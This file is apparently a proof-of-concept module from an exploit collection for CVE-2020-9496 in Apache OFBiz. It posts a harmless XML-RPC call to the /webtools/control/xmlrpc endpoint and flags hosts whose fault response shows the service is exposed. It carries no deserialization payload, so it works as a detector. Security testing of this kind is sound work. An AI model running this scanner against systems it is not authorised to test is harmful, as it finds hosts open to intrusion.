2020/CVE-2020-9496/poc/pocsploit/CVE-2020-9496.py

import requests


# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''Apache OFBiz XML-RPC Java Deserialization''',
        "description": '''XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03''',
        "severity": "medium",
        "references": [
            "http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html", 
            "http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html", 
            "https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "cvss-score": "",
            "cve-id": "CVE-2020-9496",
            "cwe-id": "CWE-79,CWE-502"
        },
        "metadata":{
            "vuln-target": "",
            
        },
        "tags": ["cve", "cve2020", "apache", "java", "ofbiz"],
    }


# Vender Fingerprint
def fingerprint(url):
    return True

# Proof of Concept
def poc(url):
    result = {}
    try:
        url = format_url(url)

        path = """/webtools/control/xmlrpc"""
        method = "POST"
        data = """<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>"""
        headers = {'Origin': 'http://{{Hostname}}', 'Content-Type': 'application/xml'}
        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        if ("""faultString""" in resp0.text and """No such service [ProjectDiscovery]""" in resp0.text and """methodResponse""" in resp0.text) and ("""text/xml""" in str(resp0.headers)) and (resp0.status_code == 200):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path

    except:
        result["success"] = False
    
    return result


# Exploit, can be same with poc()
def exp(url):
    return poc(url)


# Utils
def format_url(url):
    url = url.strip()
    if not ( url.startswith('http://') or url.startswith('https://') ):
        url = 'http://' + url
    url = url.rstrip('/')

    return url